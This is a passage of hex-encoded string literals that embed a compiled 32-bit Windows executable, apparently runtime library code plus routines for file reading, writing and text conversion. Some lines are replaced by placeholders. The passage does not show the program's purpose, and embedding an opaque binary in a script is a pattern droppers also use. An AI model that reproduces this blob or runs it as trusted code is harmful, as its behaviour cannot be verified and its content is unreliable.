'8116effff8b75088d4810890e8b4dec83c1f0e8f76effff8b4de883c1f0e9' \
'52ffffff68202242008d4dece88564ffffc645fc058b750c85f6740b8bcee' \
'85367ffff5056eb076a0668582242008d4dece8a594ffff6a026868224200' \
'8d4dece89694ffff51518d4dece8ca0800008b4dec8d49f0e89d6dffff8d4' \
'8108b450889088b4dec8d49f0e8836effffb8ddb04000c38b4de88d49f0e8' \
'726effff8b4508e803420000c36a08b8de984100e8194200008bf2518d4df' \
'0e8f863ffff8365fc006a01683c0542008d4df0e82a94ffff8bd68d4dece8' \
'ce010000c645fc018b008d4df0ff70f450e80e94ffffc645fc008b4dec8d4' \
'9f0e8146effff8b4df085f60f95c2e8110000008b4df08d49f0e8fc6dffff' \
'e890410000c36a14b801994100e8a64100008ada518d4df0e88563ffff836' \
'5fc006a0268a40142008d4df0e8b793ffff6af5ff15cca041008b4df08bd0' \
'8d710233ff668b0183c102663bc775f5572bce8d45e850d1f951ff75f052f' \
'f15b0a14100803d3080420000750484db7409ff75f0ff15b4a14100a17480' \
'420033db3958f40f84ef00000053536a045353680000004050ff1514a1410' \
'08bf083feff0f84d200000085f60f84ca0000008d45e45056895de0895de4' \
'ff15f8a041008945e03bc37518395de47513538d45ec506a0368c0f841005' \
'6ff1504a141006a02535356ff15b8a141008b4df08d5102668b0183c10266' \
'3bc375f5535353532bcad1f951ff75f05368e9fd0000ff15bca141008bf88' \
'<KEY>' \
'fc75f433c0505057532bcad1f951ff75f05068e9fd0000ff15bca1410033c' \
'05088043b8d45ec50575356ff1504a1410053e8252600005956ff1508a141' \
'0056ff15c4a041008d45f050b984804200e8df6bffff8b4df08d49f0e86d6' \
'cffffe801400000c36a0cb8b3984100e8174000008bf28bf9897de833db89' \
'5dfc6870224200895df0e8e861ffff5368ce1f0000895dfc68002000008bc' \
'fc745f001000000e8356affff505356536800100000ff15c0a141006aff8b' \
'cfe85390ffff51689c2242008bcfe88d0600005168a02242008bcfe880060' \
'00056568d45ec68a422420050e8a7fbffff83c410c745fc010000008b008b' \
'cfff70f450e8b891ffff8b4dec8d49f0e8c26bffff8bc7e8543f0000c36a2' \
'cb823984100e89d3f00008bf18975d832db8955d485d2754a8d45d4506a28' \
'ff1530a1410050ff1568a0410085c07531568d45d868c822420050e83dfbf' \
'<KEY>' \
'e9cd000000b3018d45c850566a00ff1504a0410085c0752884db7409ff75d' \
'4ff15c4a04100568d45d8682423420050e8ecfaffff83c40cc745fc010000' \
'00ebaa33c08d7ddcabababab8b45c86a025f33c9518945e08b45cc516a108' \
'945e48d45dc5051ff75d4c745dc01000000897de8ff1500a0410085c07549' \
'ff15c0a04100ff75d88bf08d45d0686023420050e88dfaffff83c40c897df' \
'c8b088bd6e852fcffff8b45d08d48f0e8b06affff84db0f8449ffffffff75' \
'd4ff15c4a04100e93bffffff84db7409ff75d4ff15c4a04100b001e8333e0' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'718008b4d08e89c66ffff8365fc008d45fc508bcfe86b0000008b5dfc85db' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'09833d6880420000752c68b023420051ff15a4a0410068d0234200ff35708' \
'04200a36c804200ff15a4a04100a368804200a16c80420085c07428685c80' \
'4200ffd085c0740932d2b9f0234200eb1bff15c0a041008bd0b940244200e' \
'8f5f9ffff59c3b201b9a0244200e85afaffff59c38b0d7080420085c9751e' \
'6838fc4100ff1528a141008bc8890d7080420085c97507a168804200eb398' \
'33d6c804200007409a16880420085c0752b68b023420051ff15a4a0410068' \
'd0234200ff3570804200a36c804200ff15a4a04100a36880420085c07408f' \
'f355c804200ffd0c36820040000b86a984100e8c03b00008bf28bf933db89' \
'5dfc5689bdd8fbffff899ddcfbffffe85c5dffff33c0895dfc680e0400006' \
'68985e0fbffff8d85e2fbffff5350c785dcfbffff01000000e83432000083' \
'c40c8d85d4fbffff508d85e0fbffff506808020000535653ff15c4a141008' \
'5c074278d8de0fbffff8d5102668b0183c102663bc375f52bcad1f9518d85' \
'e0fbffff508bcfe8b665ffff8bc7e8ea3a0000c36a14b82c994100e8ec3a0' \
'0008bc28945e88bd9895de48bc8e8f563ffff33c050506a03506a01680000' \
'008053ff1514a141008bf8ff15c0a041008bf083ffff0f84eb00000085ff0' \
'f84e30000008d45e05057ff15f8a041008bf08d460150e8760700008365f0' \
'00598bd86a008d45f050565357895decff15d4a041008b45f033c9880c180' \
'fb703bac0f84100663b02751a0fb643023a420275118d43038945ec8b45f0' \
'83e8038945f0eb038b45f0515150ff75ec5168e9fd0000ff15a4a141008bf' \
'085f6752eff15c0a04100ff75e48bf08d45e4680825420050e820f6ffff83' \
'<KEY>' \
'fff5650ff75f0ff75ec6a0068e9fd0000ff15a4a141008b4de850e8638aff' \
'ff53e8a81f00005957ff15c4a04100b001eb2f538d45e8686825420050e8c' \
'0f5ffff83c40cc745fc010000008b088bd6e881f7ffff8b45e88d48f0e8df' \
'<KEY>' \
'<KEY>' \
'e8af63ffff8a4dff8bd06a7b5866890417438d4702d1f83bc67ccf5f84c97' \
'4098b4df856e8c363ffff5e8bc35bc9c20800558bec83ec24568bf18b4d08' \
'578975ece8600100008bf8897df885ff0f844d01000053b930014200e8480' \
'100008b368945fc8b4ef433db8d044e895de88945f03bf00f8324010000ff' \
'750856e884230000595985c07416ff75088d34785643e871230000595985c' \
'075ed895de88bcee8010100008d344683c6023b75f072c985db0f8ee50000' \
'008b7dfc2b7df88b4dec0faffb8b018b70f403fe8bc63bfe0f4fc7508975f' \
'0897ddce8d662ffff8d0c708945e48bd8894de03bc10f83a00000008b7df8' \
'ff750853e8092300008bd059598955f885d274708b45fc8d1c00895df4eb0' \
'38b5df48bc22b45e403dad1f82bf02bf78d047a8d0c3651505153e863adff' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'8160207805dc380790800c70148a34100740f837904007409ff7104ff15d4' \
'<KEY>' \
'65e5dc20400558bec568bf1e8b9fffffff6450801740756e83f040000598b' \
'<KEY>' \
'866ffffff83c40c85c0783cff75088d45086a1050e82dffffff83c40c85c0' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0740eff75086a00ff7104ff1524a141005dc2040033d28d411442f00fc110' \
'8d4108c3558becff75086a00ff7104ff15dca141005dc20400558bec568b7' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'000040008d4e14c70638000000894608894604c7460c000b0000c7461074a' \
'34100e8b700000085c07907c605b4804200018bc65ec356578bf16a1833ff' \
'8d46145750e8342c000083c40c897e2c897e30897e345f8bc65ec3568bf18' \
'd461450ff159ca141008d4e2c5ee99a000000558bec8b550885d2780e3b51' \
'047d098b018d04905dc204006a006a006a01688c0000c0ff15e0a14100cc5' \
'<KEY>' \
'3075058b7608eb0f508d4e2ce8a6ffffff8b30eb0233f657ff15eca041005' \
'f8bc65e5dc204005633f6565651e82cefffff83c40c85c07515ff15c0a041' \
'<KEY>' \
'82a2b00008326005983660400836608005ec3558bec56ff75088bf1e8f332' \
'0000c70688a341008bc65e5dc20400558bec56ff75088bf1e8d8320000c70' \
'<KEY>' \
'008bc65e5dc20400558bec56ff75088bf1e8a2320000c706bca341008bc65' \
'e5dc20400c70188a34100e9ad320000e9a8320000558bec568bf1c70688a3' \
'4100e897320000f6450801740756e811010000598bc65e5dc20400558bec5' \
'68bf1e878320000f6450801740756e8f2000000598bc65e5dc20400558bec' \
'83ec106a018d45fc508d4df0c745fc90a34100e80b32000068202b42008d4' \
'5f050c745f088a34100e8fe320000cc558bec83ec0c8b45088945088d4508' \
'508d4df4e8b831000068902b42008d45f450c745f4b0a34100e8d0320000c' \
'c558bec83ec0c8b45088945088d4508508d4df4e88a31000068cc2b42008d' \
'45f450c745f4bca34100e8a2320000cc558bec5de9eb050000558bec833d9' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'fff6450801740756e8a9ffffff598bc65e5dc20400558bec8b4508530fb70' \
'<KEY>' \
'<KEY>' \
'bf18b4d08c6460c0085c97566e8a64300008bd08956088b4a6c890e8b4a68' \
'894e048b0e3b0dfc6942007411a1c46a42008542707507e8ee39000089068' \
'b46043b057063420074158b4e08a1c46a42008541707508e8513d00008946' \
'048b4e088b4170a802751683c802894170c6460c01eb0a8b0189068b41048' \
'946048bc65e5dc20400558bec83ec10ff750c8d4df0e867ffffff8b45f00f' \
'b64d088b80900000000fb704482500800000807dfc0074078b4df8836170f' \
'dc9c3558bec6a00ff7508e8bdffffff59595dc3558bec6803010000ff7508' \
'e81841000059595dc3558bec6a08ff7508e80741000059595dc3538bdc515' \
'183e4f083c404558b6b04896c24048bec8b4b08668b530c83ec20833dc074' \
'4200017c480fb7c2660f6ec0f20f70c000660f70d0008bc125ff0f00003df' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'b6d8b450885c07513e8cf4600006a165e8930e8564600008bc6eb53578b7d' \
'1085ff741439750c720f565750e8bb27000083c40c33c0eb36ff750c6a005' \
'0e81927000083c40c85ff7509e88e4600006a16eb0c39750c7313e8804600' \
'006a225e8930e8074600008bc6eb036a16585f5e5dc3558bec8b45145685c' \
'0743c837d08007513e8554600006a165e8930e8dc4500008bc6eb25837d10' \
'0074e739450c7309e8374600006a22ebe050ff7510ff7508e8960b000083c' \
'40c33c05e5dc3558bec5151a16063420033c58945fc56578b7d0885ff7516' \
'e8024600006a165e8930e8894500008bc6e939010000ff750c57e86f17000' \
'059593b450c720733c0668907ebd38b451033f68b008b80a800000085c074' \
'4956566aff57680001000050e8fb4600008bc883c418894df885c97539e8a' \
'8450000c7002a000000e89d4500008b00e9de0000000fb70783f841720b83' \
'f85a770683c02066890783c70266393775e533c0e9bc000000394d0c73113' \
'3c0668907e8654500006a22e95effffff85c97e496ae033d258f7f183f802' \
'723d8d0c4d0800000081f90004000077158bc1e8b74600008bf485f6741ec' \
'706cccc0000eb1351e8d44500008bf05985f67409c706dddd000083c6088b' \
'4df885f67510e808450000c7000c000000e95bffffff8b4510518b00566af' \
'f576800010000ffb0a8000000e82546000083c41885c0741156ff750c57e8' \
'2645000083c40c8bf8eb0ae8c64400006a2a5f893856e814000000598bc78' \
'd65f05f5e8b4dfc33cde881fbffffc9c3558bec8b450885c0741283e80881' \
'38dddd0000750750e8d1240000595dc3558bec6a00ff750cff7508e805000' \
'00083c40c5dc3558bec83ec10ff75108d4df0e8d7fbffff8d45f050ff750c' \
'ff7508e835feffff83c40c807dfc0074078b4df8836170fdc9c3558bec568' \
'b751485f6750433c0eb708b4d0885c97513e8274400006a165e8930e8ae43' \
'<KEY>' \
'3c40c33c0eb36ff750c6a0051e82f00000083c40c85ff7509e8e34300006a' \
'16eb0c39750c7313e8d54300006a225e8930e85c4300008bc6eb036a16585' \
'<KEY>' \
'd1e9f3ab13c966f3ab5f8b45085dc3558bec83ec10eb0dff7508e88345000' \
'05985c0740fff7508e8294400005985c074e6c9c36a018d45fc508d4df0c7' \
'45fc90a34100e86c2b000068202b42008d45f050c745f088a34100e85f2c0' \
'000cc558becff15e4a141006a01a374744200e862450000ff7508e8804800' \
'00833d7474420000595975086a01e8484500005968090400c0e84e4800005' \
'95dc3558bec81ec240300006a17e813c4000085c074056a0259cd29a35872' \
'4200890d54724200891550724200891d4c724200893548724200893d44724' \
'200668c1570724200668c0d64724200668c1d40724200668c053c72420066' \
'8c2538724200668c2d347242009c8f05687242008b4500a35c7242008b450' \
'4a3607242008d4508a36c7242008b85dcfcffffc705a871420001000100a1' \
'60724200a364714200c70558714200090400c0c7055c71420001000000c70' \
'568714200010000006a04586bc000c7806c714200020000006a04586bc000' \
'8b0d60634200894c05f86a0458c1e0008b0d64634200894c05f86898b1410' \
'0e8ccfeffffc9c3558bec6a08e8020000005dc3558bec81ec1c0300006a17' \
'e80ec3000085c074058b4d08cd29a358724200890d5472420089155072420' \
'0891d4c724200893548724200893d44724200668c1570724200668c0d6472' \
'4200668c1d40724200668c053c724200668c2538724200668c2d347242009' \
'c8f05687242008b4500a35c7242008b4504a3607242008d4508a36c724200' \
'8b85e4fcffffa160724200a364714200c70558714200090400c0c7055c714' \
'20001000000c70568714200010000006a04586bc0008b4d0889886c714200' \
'6898b14100e8f2fdffffc9c36a0c68082c4200e80a54000033db895de433c' \
'08b7d0885ff0f95c085c07518e813410000c70016000000e89940000083c8' \
'ffe9c700000033c039450c0f95c085c074dc897d0857e86601000059215df' \
'cf6470c40757157e847460000598bd083faff741983fafe74148bcac1f905' \
'83e01fc1e00603048de0744200eb05b8506c4200f640247f752983faff741' \
'983fafe74148bc2c1f80583e21fc1e206031485e0744200eb05ba506c4200' \
'f64224807416e881400000c70016000000e80740000083cbff895de485db7' \
'52557e8274600008bf08d45105053ff750c57e8bd4600008bd8895de45756' \
'e8da45000083c41cc745fcfeffffffe80e0000008bc3e858530000c38b5de' \
'48b7d0857e81101000059c3a160814200566a145e85c07507b800020000eb' \
'063bc67d078bc6a3608142006a0450e8965900005959a35c81420085c0751' \
'e6a0456893560814200e87d5900005959a35c81420085c075056a1a585ec3' \
'33d2b9d0604200890c0283c1208d520481f9506342007d07a15c814200ebe' \
'833c05ec3e8a8010000803d38774200007405e821570000ff355c814200e8' \
'd91f000083255c8142000059c3b8d0604200c3558bec568b7508b9d060420' \
'<KEY>' \
'0c0080000059eb0a8d462050ff15e8a041005e5dc3558bec8b450883f8147' \
'<KEY>' \
'<KEY>' \
'1600cff7fffff2bc1c1f80583c01050e86e580000595dc383c02050ff15ec' \
'<KEY>' \
'<KEY>' \
'56e8f700000059eb2f56e82c0000005985c0740583c8ffeb1ff7460c00400' \
'000741456e8e843000050e8df5b000059f7d8591bc0eb0233c05e5dc3558b' \
'ec53568b750833db8b460c24033c027542f7460c080100007439578b3e2b7' \
'e0885ff7e2e57ff760856e8a54300005950e8815c000083c40c3bc7750f8b' \
'460c84c0790f83e0fd89460ceb07834e0c2083cbff5f8b4e0883660400890' \
'e5e8bc35b5dc36a01e85700000059c36a0c68282c4200e8cf5000008b7508' \
'85f6750956e83c00000059eb2556e855feffff598365fc0056e820ffffff5' \
'98bf8897de4c745fcfeffffffe80e0000008bc7e8da500000c38b75088b7d' \
'e456e893feffff59c36a1468482c4200e87a50000033ff897de4217ddc6a0' \
'1e8ab55000059217dfc33f68b5d088975e03b35608142000f8d86000000a1' \
'5c8142008b04b085c0745df6400c8374575056e815feffff5959c745fc010' \
'<KEY>' \
'ff741f47897de4eb1985db7515f6400c02740f50e86efeffff5983f8ff750' \
'30945dc8365fc00e80c00000046eb858b5d088b7de48b75e0a15c814200ff' \
'34b056e815feffff5959c3c745fcfeffffffe81600000083fb018bc774038' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0c740705a6b14100eb5bf6c110740705a4b14100eb4f05a2b14100eb480fb' \
'74208f6c10374098d04c51eb24100eb23f6c10c74098d04c51cb24100eb15' \
'f6c11074098d04c51ab24100eb078d04c518b241008a0884c9740580f9e07' \
'50680780100750233c05f5e5dc36a0c68702c4200e8e94e00006a03e82254' \
'0000598365fc00e8250000008bf08975e4c745fcfeffffffe80b0000008bc' \
'6e8054f0000c38b75e46a03e85955000059c3558bec83ec10a16063420033' \
'c58945fc5333db833d50634200ff5657895df0740833c040e900010000a1b' \
'06d420083f8fe750ae80e630000a1b06d420083f8ff0f84e10000008d4df8' \
'5150ff15eca1410085c00f84ce0000008b7df885ff0f84c30000006ae033d' \
'258f7f783f81472458bc76bc01483c0083d000400007717e8cf3c00008bf4' \
'85f60f8499000000c706cccc0000eb1750e8e83b00008bf05985f60f84800' \
'00000c706dddd00008b7df883c608eb0233f685f6746c8d45f4505756ff35' \
'b06d4200ff15f0a1410085c0744b8b7df485ff74443b7df8773f85ff743b3' \
'3c08d5e0440663943fc7521833b00741c807b0a00750e53e813feffff5985' \
'c0740833c0408945f0eb0333c0404f83c314897df485ff75ce8b5df056e80' \
'bf6ffff598bc3eb0233c08d65e45f5e5b8b4dfc33cde873f1ffffc9c3cccc' \
'cccccccccccc57568b7424108b4c24148b7c240c8bc18bd103c63bfe76083' \
'bf80f82680300000fba25c4744200017307f3a4e91703000081f980000000' \
'0f82ce0100008bc733c6a90f000000750e0fba25c86a4200010f82da04000' \
'00fba25c4744200000f83a7010000f7c7030000000f85b8010000f7c60300' \
'00000f85970100000fbae702730d8b0683e9048d760489078d7f040fbae70' \
'37311f30f7e0e83e9088d7608660fd60f8d7f08f7c60700000074630fbae6' \
'030f83b2000000660f6f4ef48d76f4660f6f5e1083e930660f6f4620660f6' \
'f6e308d763083f930660f6fd3660f3a0fd90c660f7f1f660f6fe0660f3a0f' \
'c20c660f7f4710660f6fcd660f3a0fec0c660f7f6f208d7f307db78d760ce' \
'9af000000660f6f4ef88d76f88d4900660f6f5e1083e930660f6f4620660f' \
'6f6e308d763083f930660f6fd3660f3a0fd908660f7f1f660f6fe0660f3a0' \
'<KEY>' \
'eb56660f6f4efc8d76fc8bff660f6f5e1083e930660f6f4620660f6f6e308' \
'd763083f930660f6fd3660f3a0fd904660f7f1f660f6fe0660f3a0fc20466' \
'0f7f4710660f6fcd660f3a0fec04660f7f6f208d7f307db78d760483f9107' \
'c13f30f6f0e83e9108d7610660f7f0f8d7f10ebe80fbae102730d8b0683e9' \
'048d760489078d7f040fbae1037311f30f7e0e83e9088d7608660fd60f8d7' \
'f088b048d28d24000ffe0f7c7030000007515c1e90283e20383f908722af3' \
'a5ff249528d24000908bc7ba0300000083e904720c83e00303c8ff24853cd' \
'14000ff248d38d2400090ff248dbcd14000904cd1400078d140009cd14000' \
'23d18a0688078a46018847018a4602c1e90288470283c60383c70383f9087' \
'2ccf3a5ff249528d240008d490023d18a0688078a4601c1e90288470183c6' \
'0283c70283f90872a6f3a5ff249528d240009023d18a06880783c601c1e90' \
'283c70183f9087288f3a5ff249528d240008d49001fd240000cd2400004d2' \
'4000fcd14000f4d14000ecd14000e4d14000dcd140008b448ee489448fe48' \
'b448ee889448fe88b448eec89448fec8b448ef089448ff08b448ef489448f' \
'f48b448ef889448ff88b448efc89448ffc8d048d0000000003f003f8ff249' \
'528d240008bff38d2400040d240004cd2400060d240008b44240c5e5fc390' \
'8a0688078b44240c5e5fc3908a0688078a46018847018b44240c5e5fc38d4' \
'9008a0688078a46018847018a46028847028b44240c5e5fc3908d7431fc8d' \
'7c39fcf7c7030000007524c1e90283e20383f908720dfdf3a5fcff2495c4d' \
'340008bfff7d9ff248d74d340008d49008bc7ba0300000083f904720c83e0' \
'032bc8ff2485c8d24000ff248dc4d3400090d8d24000fcd2400024d340008' \
'a460323d188470383ee01c1e90283ef0183f90872b2fdf3a5fcff2495c4d3' \
'40008d49008a460323d18847038a4602c1e90288470283ee0283ef0283f90' \
'87288fdf3a5fcff2495c4d34000908a460323d18847038a46028847028a46' \
'01c1e90288470183ee0383ef0383f9080f8256fffffffdf3a5fcff2495c4d' \
'340008d490078d3400080d3400088d3400090d3400098d34000a0d34000a8' \
'd34000bbd340008b448e1c89448f1c8b448e1889448f188b448e1489448f1' \
'48b448e1089448f108b448e0c89448f0c8b448e0889448f088b448e048944' \
'8f048d048d0000000003f003f8ff2495c4d340008bffd4d34000dcd34000e' \
'cd3400000d440008b44240c5e5fc3908a46038847038b44240c5e5fc38d49' \
'008a46038847038a46028847028b44240c5e5fc3908a46038847038a46028' \
'847028a46018847018b44240c5e5fc38da42400000000578bc683e00f85c0' \
'0f85d20000008bd183e17fc1ea0774658da4240000000090660f6f06660f6' \
'f4e10660f6f5620660f6f5e30660f7f07660f7f4f10660f7f5720660f7f5f' \
'30660f6f6640660f6f6e50660f6f7660660f6f7e70660f7f6740660f7f6f5' \
'0660f7f7760660f7f7f708db6800000008dbf800000004a75a385c9744f8b' \
'd1c1ea0485d274178d9b00000000660f6f06660f7f078d76108d7f104a75e' \
'f83e10f742a8bc1c1e902740d8b1689178d76048d7f044975f38bc883e103' \
'740f8a06880746474975f78d9b00000000585e5fc38da42400000000eb03c' \
'cccccba100000002bd02bca518bc28bc883e10374098a16881746474975f7' \
'c1e802740d8b1689178d76048d7f044875f359e9fafeffff558bec538b5d1' \
'05733ff85db7514e83a340000c70016000000e8c033000033c0eb735668bc' \
'0300006a01e8b64d00008bf0595985f67449e8412f0000ff706c56e8bf2f0' \
'0008b4514834e04ff8946588b451c5959895e5485c075038d451050ff7518' \
'566894d64000ff750cff7508ff15fca1410085c0751cff15c0a041008bf85' \
'6e80c1400005985ff740757e89b3300005933c05e5f5b5dc36a0c68902c42' \
'00e887460000e8d32e00008365fc00ff7058ff505450e8200000008b4dec8' \
'b018b008945e45150e8135b00005959c38b65e8ff75e4e8fe4e0000cc558b' \
'ec56e8b22e00008bf085f6741583beb4030000007405e8e600000056e84a2' \
'e000059ff7508ff1504a24100cc833d8074420000753968e0b44100680008' \
'00006a0068f0b44100ff1508a2410050ff15a4a0410085c07501c350ff15f' \
'4a14100a37c744200c70580744200010000006a01ff357c744200ff15f8a1' \
'4100ffd0f7d81bc040c3558bec56e8a12c000050e8533500008bf05985f67' \
'52c8b750856e88b2c000050e85c350000595985c0750dff15c0a0410050ff' \
'1504a24100ff1500a241008906eb1b8b4d08518b41548946548b415889465' \
'88b4104894604e8532c0000e8413500008986b403000085c0740be837ffff' \
'ff8986b4030000e8bdfeffffcc833d887442000075386808b541006800080' \
'0006a0068f0b44100ff1508a2410050ff15a4a0410085c0742450ff15f4a1' \
'4100a384744200c7058874420001000000ff3584744200ff15f8a14100ffe' \
'0c3566a046a20e8ae4b000059598bf056ff15f4a14100a3c0804200a3bc80' \
'420085f675056a18585ec383260033c05ec36a0c68b02c4200e8c4440000e' \
'8f44d00008365fc00ff7508e823000000598bf08975e4c745fcfeffffffe8' \
'0b0000008bc6e8df440000c38b75e4e8cf4d0000c3558bec5153568b35f8a' \
'1410057ff35c0804200ffd6ff35bc8042008945fcffd68bd88b45fc3bd80f' \
'82820000008bfb2bf88d4f0483f904727650e85e5a00008bf08d4704593bf' \
'07347b8000800003bf073028bc68b5dfc03c63bc6720d5053e8784b000059' \
'5985c075148d46103bc6723e5053e8644b0000595985c07431c1ff02508d1' \
'cb8ff15f4a14100a3c0804200ff7508ff15f4a141008d4b04518903ff15f4' \
'a14100a3bc8042008b4508eb0233c05f5e5bc9c3558becff7508e8fffefff' \
'ff7d81bc0f7d859485dc3558bec51518d45f850ff150ca241008b4df88b45' \
'fc6a0081c10080c12a688096980015214e62fe5051e8d759000083fa077c0' \
'e7f073dff6f4093760583c8ff8bd08b4d0885c974058901895104c9c3e965' \
'e7ffff8b0d6063420083c90133c0390d8c7442000f94c0c36a0c68d02c420' \
'0e85043000033c03945080f95c085c07515e860300000c70016000000e8e6' \
'2f000083c8ffeb63e8c0f0ffff83c020506a01e8faf0ffff59598365fc00e' \
'8aaf0ffff83c02050e8ed350000598bf08d450c506a00ff7508e890f0ffff' \
'83c02050e8793600008bf8897de4e87df0ffff83c0205056e88e35000083c' \
'418c745fcfeffffffe80b0000008bc7e80c430000c38b7de4e854f0ffff83' \
'c020506a01e8f8f0ffff5959c3558becff750cff7508e80800000059f7d85' \
'91bc05dc3558bec83ec28a16063420033c58945fc8b45085685c0751be86a' \
'2f0000832000e8962f00006a165e8930e81d2f00008bc6eb5cf7450cf9fff' \
'fff75dc8d4dd8516a0050ff1510a2410085c07516ff15c0a0410050e8412f' \
'000059e85c2f00008b00eb2cf645d8107524f645d801741ef6450c027418e' \
'80d2f0000c70005000000e8362f0000c7000d000000ebcd33c08b4dfc33cd' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'f3a63c14173038d344a740583c210ebea8bc65e5dc3558bec33d28bc23945' \
'<KEY>' \
'20000570f858c0000008b7d1033c085ff0f84920000008b550885d27517e8' \
'2f2e0000c70016000000e8b52d0000b8ffffff7feb748b4d0c85c974e2535' \
'<KEY>' \
'83c0200fb7f0eb028bf00fb701663bc3720c663b45fc770683c0200fb7c08' \
'<KEY>' \
'7510ff750cff7508e80600000083c4105fc9c3558bec83ec14535633f6573' \
'975100f84dc0000008b5d0885db751ae8862d0000c70016000000e80c2d00' \
'00b8ffffff7fe9bd0000008b7d0c85ff74dfff75148d4dece8d3e4ffff8b4' \
'5ec39b0a800000075518b4d106a415a6a5a5e2bdf8975fceb036a5a5e0fb7' \
'043b663bc2720d663bc6770883c0200fb7f0eb028bf00fb707663bc2720c6' \
'<KEY>' \
'45ec500fb70350e87d5600000fb7f08d45ec500fb70750e86d56000083c41' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'c102ebe80fb7020fb7092bc15e5dc3558bec51e8a02700008b4d088945fc8' \
'<KEY>' \
'<KEY>' \
'fb7116685d275d533c08bf166390174410fb71f33d28bc76685db741e0fb7' \
'39897d088b7d0c8bd3663b5508740b83c0020fb7106685d275ef33d266391' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'a1c074420083f8010f8ef50000008bc725ff0f00006a025e3df00f0000770' \
'6f30f6f07eb296a08660fefc00fb7c95a0fb7c1660f73d802660fc4c00733' \
'<KEY>' \
'0007764f30f6f0a660f3a63c10d760883c2108b4df8ebde0f83e101000066' \
'<KEY>' \
'bc125ff0f00003df00f00007737f30f6f0ff30f6f11660f3a63d10d713f78' \
'<KEY>' \
'c03d6e974ffffff0fb7018365fc00663945fc7412663907750603fe03ceeb' \
'<KEY>' \
'0f20f70c0006a02660f70e000660fefdb5e8bc125ff0f00003df00f000077' \
'<KEY>' \
'110ebd10fbcc08945f8d1e88d0c410fb70133d2663bd00f84ee0000000fb7' \
'17663bd075768bd18bc725ff0f00003df00f0000774b8bc225ff0f00003df' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'e35bc36a0c68f02c4200e8023c000033c03945080f95c085c07515e812290' \
'000c70016000000e89828000083c8ffeb63e872e9ffff83c020506a01e8ac' \
'e9ffff59598365fc00e85ce9ffff83c02050e89f2e0000598bf08d450c506' \
'a00ff7508e842e9ffff83c02050e8fd5200008bf8897de4e82fe9ffff83c0' \
'205056e8402e000083c418c745fcfeffffffe80b0000008bc7e8be3b0000c' \
'38b7de4e806e9ffff83c020506a01e8aae9ffff5959c3558bec833dcc7442' \
'000075758b550885d27517e86b280000c70016000000e8f1270000b8fffff' \
'f7f5dc38b4d0c85c974e25356576a415f6a5a2bd15b0fb7040a663bc7720d' \
'663bc3770883c0200fb7f0eb028bf00fb701663bc7720b663bc3770683c02' \
'00fb7c083c1026685f67405663bf074c80fb7c80fb7c65f5e2bc15b5dc36a' \
'00ff750cff7508e80500000083c40c5dc3558bec83ec108d4df05356ff751' \
'0e851dfffff8b5d0885db74078b750c85f6751ae8ca270000c70016000000' \
'e850270000baffffff7fe98b0000008b45f05783b8a80000000075426a415' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'005dc3558bec515356ff3590744200ff15f8a141008bd88b450885c07516e' \
'8ea2600006a165e8930e8712600008bc6e9d90000008320005785db0f85ad' \
'0000008b3508a24100680008000053bb18b5410053ffd68b3dc0a04100894' \
'5fc85c0752bffd783f857750e6a006a0053ffd68945fc85c07516e8922600' \
'006a165e8930e8192600008bc6e9800000006834b5410050ff15a4a041008' \
'bd885db7522e86a2600008bf0ffd750e873260000598906e8e9250000ffd7' \
'50e86326000059eb4c8b35f4a1410053ffd66a008bf8ffd65768907442008' \
'bf0ff1514a241003bc67409ff75fcff1518a241008b45086a0450ffd385c0' \
'7514e812260000c7000c000000e8072600008b00eb0233c05f5e5bc9c3558' \
'bec538b5d085633f685db7515e8e9250000c70016000000e86f25000083c8' \
'ffeb685768bc0300006a01e8643f00008bf8595985ff743de8ef200000ff7' \
'06c57e86d2100008b45105959576a04576890e44000ff750c895f54568947' \
'58ff15fca141008bf089770485f67522ff15c0a041008bf057e8c60500005' \
'985f6740756e8552500005983c8ff5f5e5b5dc356ff1574a1410083f8ff74' \
'd28bc6ebeb6a0c68102d4200e830380000e87c2000008365fc00ff7058ff5' \
'05459e8200000008b4dec8b018b008945e45150e8bc4c00005959c38b65e8' \
'ff75e4e8a7400000cc56e85e2000008bf085f67416837e04ff7409ff7604f' \
'f15c4a0410056e8f51f0000596a00ff1504a24100cc558bece8a61e000050' \
'e8582700008bd05985d27521ff7508e8911e000050e862270000595985c07' \
'528ff15c0a0410050ff1504a241008b4d08518b41548942548b4158894258' \
'8b4104894204e8631e0000e83effffffcc558becff750c6a00ff750868ba3' \
'34100e80500000083c4105dc3558bec83ec20576a0733d25933c08d7de489' \
'55e0f3ab5f39450c7515e85f240000c70016000000e8e523000083c8ffc9c' \
'3ff75148d45e0ff7510c745e4ffffff7fff750cc745ec42000000508955e8' \
'8955e0ff550883c410c9c3558becff75186a00ff7514ff7510ff750cff750' \
'8e80500000083c4185dc3558bec51837d14007515e8f9230000c700160000' \
'00e87f23000083c8ffc9c353568b7508578b7d1085ff751485f6751839750' \
'c0f85ae00000033c0e9ba00000085f60f849f0000008b5d0c85db0f849400' \
'0000e8b0230000ff751cff7518ff75143bdf762c8b188d470150566885414' \
'100e88900000083c41883f8fe754ee885230000833822756fe87b23000089' \
'18eb668b00535668854141008945fce85d00000033c983c41866894c5efe8' \
'3f8fe751b83ffff751ae84d2300008338227537e8432300008b4dfc8908eb' \
'2b85c0792a33c966890e83f8fe751de829230000c70022000000eb0be81c2' \
'30000c70016000000e8a222000083c8ff5f5e5bc9c3558bec83ec208365e0' \
'00576a0733c0598d7de4f3ab3945147518e8ea220000c70016000000e8702' \
